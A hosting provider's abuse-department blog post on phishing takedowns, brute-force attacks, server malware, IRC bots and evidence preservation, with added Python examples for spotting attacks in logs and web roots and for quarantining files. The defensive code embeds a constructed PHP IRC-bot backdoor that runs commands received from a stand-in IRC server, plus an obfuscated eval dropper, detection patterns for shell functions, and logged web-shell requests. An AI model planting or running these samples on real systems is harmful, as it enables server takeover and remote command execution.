“I, the undersigned, certify under penalty of perjury”, “We believe the following host has recently been compromised”, “I received the below unsolicited commercial e-mail”: these are a few of the statements that we in the SoftLayer Abuse Department receive on a routine basis. The responsibility of responding to these quite serious matters is in and of itself what gives us our motivation and our niche in the overall scheme of this company: the protection of our network's global reputation. Without a firm and diligent abuse department, many of our customers would experience extreme packet loss left and right. Some customers would be affected by another provider's block on an entire subnet, imposed because a single server in it had been periodically attacking that provider's network for a month. Others would assuredly have their IP addresses consistently listed in spam databases, restricting e-mail contact with most or all of their clients. So, to help keep these things from happening, we need to ensure that any reported or detected abusive activity occurring on our network is thoroughly responded to. We do this by analyzing abuse reports and determining the nature of each issue; if an issue is valid, a ticket is opened with the customer for further correspondence as we track the issue's resolution. At the same time, we maintain communication with other organizations and providers to ensure that matters are quickly addressed.
While most issues are resolved, or are being resolved, within 24 to 72 hours, some require a quicker response. One of these is phishing sites, which need to be removed within a shorter time frame. Our procedures for these sites reflect the fact that they are one of the most dangerous and widespread issues on the internet today. If you're not familiar with them, or just want to read up on some of the latest news regarding these sites, you can get everything you need to know at the Anti-Phishing Working Group's (APWG) website. SoftLayer's membership in the APWG gives us access to the most recent industry-level trends and activities for a range of abuse issues, and therefore much greater insight and oversight in identifying and resolving issues that are negatively affecting our network. I can't say too much publicly beyond the general time frames above; most abuse work is to some degree like spam filtering, in that immediate disclosure of detection methods and procedures would render them useless. I can say, however, that we believe one of the most effective methods for combating phishing is consumer education. If users are familiar with how fraudulent operations work, they are more likely to recognize the components of one when they see them and not become victims. In support of this concept, we encourage all of our customers to respond to phishing site takedowns by replacing the phishing site with a redirect to the APWG's phishing education landing page. This page is an informative document that explains to the user that they were about to become a victim of illegal activity, and goes on to explain phishing in more detail. Most people in today's society won't go too far out of their way to obtain new information about trends in cybercrime. As such, the moment at which someone is about to fall for a phishing scam is considered the 'teachable moment'.
This is the moment at which someone has clicked on a link that they believe goes to their bank's website, but is redirected to an educational page about phishing instead. The page is also configured to serve a variety of languages, selected from the client's browser settings. Note that the redirect needs to cover the exact URLs the lure e-mails pointed to, not just the site's front page, since that is where the victims arrive. As more people encounter the APWG's landing page instead of a phishing site, the faster phishing education will spread and the fewer potential victims there will be. You may find information on how to implement the redirect here.
One of the next most concerning matters that we address is servers being used by unauthorized third parties to conduct some form of outbound attack. While each type is malicious in its own way and needs the same attention, here are a few specifics on some of the general types. Password cracking/brute force: this is typically done by malicious software attacking multiple hosts simultaneously while trying various username and password combinations, usually drawn from a massive list of pre-defined words. One of the easiest ways to help protect a server against being affected is to move at least SSH, FTP and RDP to non-standard ports and to ensure that you have complex passwords. Moving the ports only cuts down on the automated noise, however; what actually stops the attack is strong credentials (for SSH, preferably keys rather than passwords). I would also advise enabling account lockouts after a certain number of failed login attempts, with a timed lockout rather than a permanent one, since a permanent lockout lets an attacker lock out your legitimate users simply by failing logins on purpose. Another predominant type of malicious scanning sweeps an entire netblock, checking each host in it to see which ports are open, and reports the results back to a database for later use in the attacks described above. Essentially anything that is in some way part of an intrusion attempt is a priority.
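As an added example (not code from the original post or from SoftLayer), here is the kind of detection logic an administrator can run over their own logs to spot the two patterns just described: one source failing logins against many usernames, and one source touching many hosts across a netblock. The log lines and thresholds below are constructed and assumed, not real data or SoftLayer's criteria.

```python
"""Flag brute-force login sources and netblock sweeps from log lines.

Added example; not code from the original post or from SoftLayer. The log lines
are constructed to look like OpenSSH auth.log and iptables LOG entries, and the
thresholds are illustrative assumptions rather than any provider's policy.
"""
import re
from collections import Counter, defaultdict

# OpenSSH failure line, e.g.
#   sshd[2231]: Failed password for invalid user admin from 203.0.113.9 port 51022 ssh2
SSH_FAIL = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\d+\.\d+\.\d+\.\d+)"
)
# iptables LOG line; only the SRC=, DST= and DPT= fields are needed.
FW_HIT = re.compile(r"SRC=(\d+\.\d+\.\d+\.\d+) DST=(\d+\.\d+\.\d+\.\d+) .*?DPT=(\d+)")

# Constructed sample: one source working through a username list, one real user typo.
AUTH_LOG = """\
Jan 12 03:14:07 web1 sshd[2231]: Failed password for invalid user admin from 203.0.113.9 port 51022 ssh2
Jan 12 03:14:09 web1 sshd[2233]: Failed password for root from 203.0.113.9 port 51030 ssh2
Jan 12 03:14:11 web1 sshd[2235]: Failed password for invalid user test from 203.0.113.9 port 51041 ssh2
Jan 12 03:14:12 web1 sshd[2237]: Failed password for invalid user oracle from 203.0.113.9 port 51052 ssh2
Jan 12 03:14:14 web1 sshd[2239]: Failed password for root from 203.0.113.9 port 51060 ssh2
Jan 12 03:14:15 web1 sshd[2241]: Failed password for invalid user admin from 203.0.113.9 port 51071 ssh2
Jan 12 03:20:02 web1 sshd[2260]: Failed password for alice from 198.51.100.20 port 40112 ssh2
Jan 12 03:20:09 web1 sshd[2260]: Accepted publickey for alice from 198.51.100.20 port 40112 ssh2
""".splitlines()

# Constructed sample: one source sweeping five hosts on port 22 (and one on 3389),
# one ordinary client retrying a connection to a single web server.
FW_LOG = """\
Jan 12 04:01:00 gw kernel: DROP IN=eth0 OUT= SRC=198.51.100.7 DST=10.0.0.1 LEN=44 TTL=52 PROTO=TCP SPT=40000 DPT=22 SYN
Jan 12 04:01:00 gw kernel: DROP IN=eth0 OUT= SRC=198.51.100.7 DST=10.0.0.2 LEN=44 TTL=52 PROTO=TCP SPT=40000 DPT=22 SYN
Jan 12 04:01:00 gw kernel: DROP IN=eth0 OUT= SRC=198.51.100.7 DST=10.0.0.3 LEN=44 TTL=52 PROTO=TCP SPT=40000 DPT=22 SYN
Jan 12 04:01:01 gw kernel: DROP IN=eth0 OUT= SRC=198.51.100.7 DST=10.0.0.4 LEN=44 TTL=52 PROTO=TCP SPT=40000 DPT=22 SYN
Jan 12 04:01:01 gw kernel: DROP IN=eth0 OUT= SRC=198.51.100.7 DST=10.0.0.5 LEN=44 TTL=52 PROTO=TCP SPT=40000 DPT=22 SYN
Jan 12 04:01:01 gw kernel: DROP IN=eth0 OUT= SRC=198.51.100.7 DST=10.0.0.1 LEN=44 TTL=52 PROTO=TCP SPT=40001 DPT=3389 SYN
Jan 12 04:05:30 gw kernel: DROP IN=eth0 OUT= SRC=192.0.2.4 DST=10.0.0.5 LEN=52 TTL=118 PROTO=TCP SPT=55012 DPT=80 SYN
Jan 12 04:05:31 gw kernel: DROP IN=eth0 OUT= SRC=192.0.2.4 DST=10.0.0.5 LEN=52 TTL=118 PROTO=TCP SPT=55013 DPT=80 SYN
""".splitlines()


def brute_force_sources(lines, threshold=5):
    """Return {src_ip: (failed_logins, distinct_usernames)} for sources with at
    least `threshold` failures. Many usernames from one source in a short span
    is the signature of a dictionary attack rather than a forgotten password."""
    failures = Counter()
    usernames = defaultdict(set)
    for line in lines:
        m = SSH_FAIL.search(line)
        if m:
            user, ip = m.groups()
            failures[ip] += 1
            usernames[ip].add(user)
    return {ip: (n, len(usernames[ip])) for ip, n in failures.items() if n >= threshold}


def scan_sources(lines, min_hosts=3):
    """Return {src_ip: (distinct_hosts_probed, ports_tried)} for sources that
    touched at least `min_hosts` different destination hosts: a horizontal
    sweep across the netblock, as opposed to normal traffic to one server."""
    hosts = defaultdict(set)
    ports = defaultdict(set)
    for line in lines:
        m = FW_HIT.search(line)
        if m:
            src, dst, dport = m.groups()
            hosts[src].add(dst)
            ports[src].add(int(dport))
    return {src: (len(h), tuple(sorted(ports[src])))
            for src, h in hosts.items() if len(h) >= min_hosts}


if __name__ == "__main__":
    for ip, (n, users) in brute_force_sources(AUTH_LOG).items():
        print(f"brute force from {ip}: {n} failures, {users} usernames tried")
    for ip, (n, ports) in scan_sources(FW_LOG).items():
        print(f"sweep from {ip}: {n} hosts probed on ports {ports}")
```

Sources that trip brute_force_sources are what tools such as fail2ban block automatically; scan_sources is the view from a border firewall that logs dropped SYNs for the whole netblock, which is where a sweep is visible and a single host's log is not. Both thresholds are deliberately low for the sample and should be tuned against normal traffic before anything is blocked on them.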
Next we move on to an area of abuse that has most likely affected all of us at some point in time: malware. This is a very general term that we use to describe any software written with malicious intent. The possible functions and uses for malware are limited only by the imagination and the software platforms they are built upon (assuming the infection process doesn't accidentally crash the server). Various forms of malware have, at some point, been identified as responsible for every type of abuse issue noted in this article. At the same time, malware on your server is not the guaranteed reason it may be conducting outbound abusive activity. Most specific malware-related tickets refer to a single malicious file, or a series of them, that is publicly accessible. These issues are often resolved quickly upon deletion of the file(s) in question. However, it is equally important to ensure that the security vulnerability that allowed these files to be uploaded is repaired, or you can almost guarantee that the problem will recur. Microsoft reported that during the first half of 2008, over 90% of disclosed vulnerabilities (and the infections that followed from them) were attributable to 'weak' applications rather than to the operating system itself (Microsoft Security Intelligence Report). Vulnerabilities in the application layer remained the predominant risk throughout the second half of 2008 as well, and malware in general has remained a formidable electronic adversary through 2009 and on to the present. As such, it is very important to ensure that you are using the most current version of every installed application, and that each was written by a trusted source, in addition to maintaining the security of the operating system itself.
One very common form of malware affecting servers is an IRC (Internet Relay Chat) bot. One bot alone can be responsible for the infection of countless other machines, commonly by injecting malicious code into poorly written PHP scripts. The bigger problem with an IRC bot, however, is that it is connected to an IRC botnet controller, which is capable of commanding massive numbers of infected hosts simultaneously. While these are typically used for spam or other similar illicit activities, there is still the potential for the infected servers to be involved in even worse situations. They are, in effect, a virtual army that is literally capable of taking small countries off of the internet. In June of 2007, the F.B.I. initiated Operation 'Bot Roast', an ongoing investigation to locate the people behind the wires. In the meantime, needless to say, these matters need to be addressed as soon as possible.
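Serving the two previous paragraphs (publicly accessible malicious files, and IRC bots injected into PHP scripts), the following added example (not the post's or SoftLayer's code) triages a web root: it flags scripts sitting in upload directories where only data belongs, and files that carry the indicators a PHP IRC bot typically shows. The indicator set, the directory names and the sample files are assumptions constructed for the example.

```python
"""Triage a web root for publicly reachable malicious files and injected IRC bots.

Added example; not code from the original post or from SoftLayer. The indicator
patterns are an assumed starting set drawn from how PHP IRC bots typically
behave (open a socket to an IRC port, speak NICK/USER/JOIN/PRIVMSG, run
commands received from the channel); the sample files are constructed and inert.
"""
import re
import tempfile
from pathlib import Path

SCRIPT_EXT = {".php", ".phtml", ".php5", ".pl", ".cgi", ".py", ".sh"}
UPLOAD_DIRS = ("uploads", "files", "media", "images")  # assumed data-only directories
MAX_BYTES = 512 * 1024  # only the head of very large files is inspected

INDICATORS = {
    "fsockopen": re.compile(r"\bfsockopen\s*\("),
    "irc_port": re.compile(r"\b(?:6667|6697)\b"),
    "irc_commands": re.compile(r"['\"](?:NICK|USER|JOIN|PRIVMSG|PONG) "),
    "obfuscated_eval": re.compile(r"\beval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\("),
    "shell_from_input": re.compile(r"\b(?:shell_exec|passthru|system|exec|popen)\s*\(\s*\$"),
}


def bot_indicators(source):
    """Names of the indicators present in a file's text, sorted."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(source))


def looks_like_irc_bot(hits):
    """IRC protocol verbs plus a raw socket (or the IRC port) is the bot pattern;
    either one alone is common in legitimate code."""
    return "irc_commands" in hits and ("fsockopen" in hits or "irc_port" in hits)


def triage_webroot(root):
    """Walk `root`; return {relative_path: [flags]} for every file that is either a
    script sitting in a directory that should only hold uploaded data, or that
    carries bot/obfuscation indicators. Everything else is left out."""
    root = Path(root)
    findings = {}
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root)
        flags = []
        if path.suffix.lower() in SCRIPT_EXT and any(p in UPLOAD_DIRS for p in rel.parts[:-1]):
            flags.append("script_in_upload_dir")
        text = path.read_bytes()[:MAX_BYTES].decode("utf-8", errors="ignore")
        hits = bot_indicators(text)
        flags.extend(hits)
        if looks_like_irc_bot(hits):
            flags.append("likely_irc_bot")
        if flags:
            findings[rel.as_posix()] = flags
    return findings


# Constructed samples (inert: nothing here is executed or connects anywhere).
BOT_SAMPLE = r"""<?php
$sock = fsockopen("irc.example.net", 6667, $errno, $errstr, 30);
fwrite($sock, "NICK srv" . rand(100, 999) . "\r\n");
fwrite($sock, "USER bot 8 * :bot\r\n");
fwrite($sock, "JOIN #cmd\r\n");
while ($line = fgets($sock)) {
    if (preg_match('/PRIVMSG .* :!run (.*)/', $line, $m)) { passthru($m[1]); }
}
"""
DROPPER_SAMPLE = r"""<?php eval(base64_decode("Y29uc3RydWN0ZWQ=")); """
CLEAN_SAMPLE = r"""<?php
$name = htmlspecialchars($_GET["name"] ?? "world");
echo "Hello, $name";
"""


def build_sample_root():
    """Create a throwaway web root containing the constructed samples; return its path."""
    root = Path(tempfile.mkdtemp(prefix="webroot_"))
    (root / "uploads").mkdir()
    (root / "media").mkdir()
    (root / "index.php").write_text(CLEAN_SAMPLE)
    (root / "uploads" / "photo.jpg").write_bytes(b"\xff\xd8\xff\xe0 constructed jpeg stub")
    (root / "uploads" / "avatar.php").write_text(BOT_SAMPLE)
    (root / "media" / ".cache.php").write_text(DROPPER_SAMPLE)
    return str(root)


if __name__ == "__main__":
    for rel, flags in sorted(triage_webroot(build_sample_root()).items()):
        print(f"{rel}: {', '.join(flags)}")
```

Hits here are leads to inspect, not verdicts: fsockopen and IRC verbs appear together in legitimate IRC clients, and obfuscated eval shows up in some commercial PHP products. The script-in-upload-directory check is the one that most often points straight at the entry hole, because a PHP file under an image or file upload path means the upload handler accepted it.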
During our triage of abuse reports, we also address the very common issue of spam. The three major types, listed in order of priority, are phishing, general fraud, and spam sent from infected hosts. However, you may also be audited, if you will, with a spam ticket regarding a mailing list one of your clients is operating. For additional information regarding e-mail marketing and the industry's best practices, spamhaus.org's FAQ is a very useful resource.
Keeping the above in mind, there is one last thing to consider: maintain a backup of all removed malicious content after it has been found. Take that copy before the content is deleted, keep it somewhere that is not publicly reachable, and record the file's hashes and timestamps with it. This evidence could prove invaluable to law enforcement, should a request for it be presented. We also encourage you to review your access logs to determine the source IP address(es) of any intruder or other malicious entity, so that you can report it to the appropriate organization. As with many other aspects of life, communication regarding these issues remains critical for timely and appropriate resolutions.
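An added example (not SoftLayer's procedure or the post's own code) of the two steps above: quarantining a malicious file so the evidence survives its removal, and pulling from the access log the source IPs that planted and used it. The log lines, paths, hash choices and manifest layout are constructed assumptions for illustration.

```python
"""Preserve removed malicious content as evidence and find who placed and used it.

Added example; not code from the original post or from SoftLayer's procedures.
The access-log lines are constructed in Apache combined format; the evidence
directory, manifest layout and hash choice are assumptions for illustration.
"""
import hashlib
import json
import re
import shutil
import tempfile
import time
from collections import Counter
from pathlib import Path

COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"'
)


def quarantine(path, evidence_dir):
    """Copy `path` into `evidence_dir` (outside the web root, so the copy is not
    itself reachable), record its hashes, size and timestamps in a manifest,
    verify the copy, and only then delete the original. Returns the manifest entry."""
    src = Path(path)
    data = src.read_bytes()
    st = src.stat()
    entry = {
        "original_path": str(src.resolve()),
        "size": st.st_size,
        "sha256": hashlib.sha256(data).hexdigest(),
        "md5": hashlib.md5(data).hexdigest(),  # still what many report forms ask for
        "mtime_utc": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime(st.st_mtime)),
        "collected_utc": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
    }
    dest_dir = Path(evidence_dir)
    dest_dir.mkdir(parents=True, exist_ok=True)
    # Name by hash and add a .bin suffix so nothing will ever execute the copy.
    dest = dest_dir / f"{entry['sha256']}_{src.name}.bin"
    shutil.copy2(src, dest)  # copy2 keeps the original mtime on the copy
    if hashlib.sha256(dest.read_bytes()).hexdigest() != entry["sha256"]:
        raise RuntimeError("evidence copy does not match original; original left in place")
    entry["evidence_path"] = str(dest)
    with open(dest_dir / "manifest.jsonl", "a") as fh:
        fh.write(json.dumps(entry) + "\n")
    src.unlink()
    return entry


def parse_access_log(lines):
    """Yield dicts for lines that parse as combined-format entries; skip the rest."""
    for line in lines:
        m = COMBINED.match(line)
        if m:
            yield m.groupdict()


def requests_for(lines, target_path, method=None):
    """Count requests per source IP whose path (query string ignored) equals
    `target_path`, optionally restricted to one HTTP method."""
    counts = Counter()
    for req in parse_access_log(lines):
        if req["path"].split("?", 1)[0] == target_path and (method is None or req["method"] == method):
            counts[req["ip"]] += 1
    return dict(counts)


# Constructed log: an upload through the site's own handler, then the uploaded
# file being driven as a web shell, then a second party finding and using it.
ACCESS_LOG = """\
203.0.113.9 - - [12/Jan/2010:03:30:01 +0000] "POST /upload.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Jan/2010:03:30:05 +0000] "GET /uploads/avatar.php?cmd=id HTTP/1.1" 200 134 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Jan/2010:03:31:10 +0000] "GET /uploads/avatar.php?cmd=uname%20-a HTTP/1.1" 200 210 "-" "Mozilla/5.0"
198.51.100.20 - - [12/Jan/2010:03:35:00 +0000] "GET /index.php HTTP/1.1" 200 3321 "-" "Mozilla/5.0"
192.0.2.77 - - [12/Jan/2010:04:02:13 +0000] "GET /uploads/avatar.php HTTP/1.1" 200 134 "-" "curl/7.19.7"
""".splitlines()

SHELL_STUB = "<?php /* constructed, inert stand-in for a web shell */ ?>"


def demo():
    """Write a constructed malicious file into a throwaway web root, quarantine it,
    and report the evidence entry together with the IPs that planted and used it."""
    root = Path(tempfile.mkdtemp(prefix="webroot_"))
    bad = root / "uploads" / "avatar.php"
    bad.parent.mkdir()
    bad.write_text(SHELL_STUB)
    entry = quarantine(bad, root.parent / (root.name + "_evidence"))
    return {
        "entry": entry,
        "original_removed": not bad.exists(),
        "copy_present": Path(entry["evidence_path"]).exists(),
        "used_by": requests_for(ACCESS_LOG, "/uploads/avatar.php"),
        "uploaded_by": requests_for(ACCESS_LOG, "/upload.php", method="POST"),
    }


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The order matters: hash, copy, verify, and only then unlink, so a failed copy never costs you the only specimen. Two distinct sets of addresses usually come out of the log: the one that uploaded the file through the site's own handler (the POST, which also tells you which script to fix) and the ones that used it afterwards; report both, and quote the exact log lines and their time zone in the report.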
-Andrew Smith - Martinez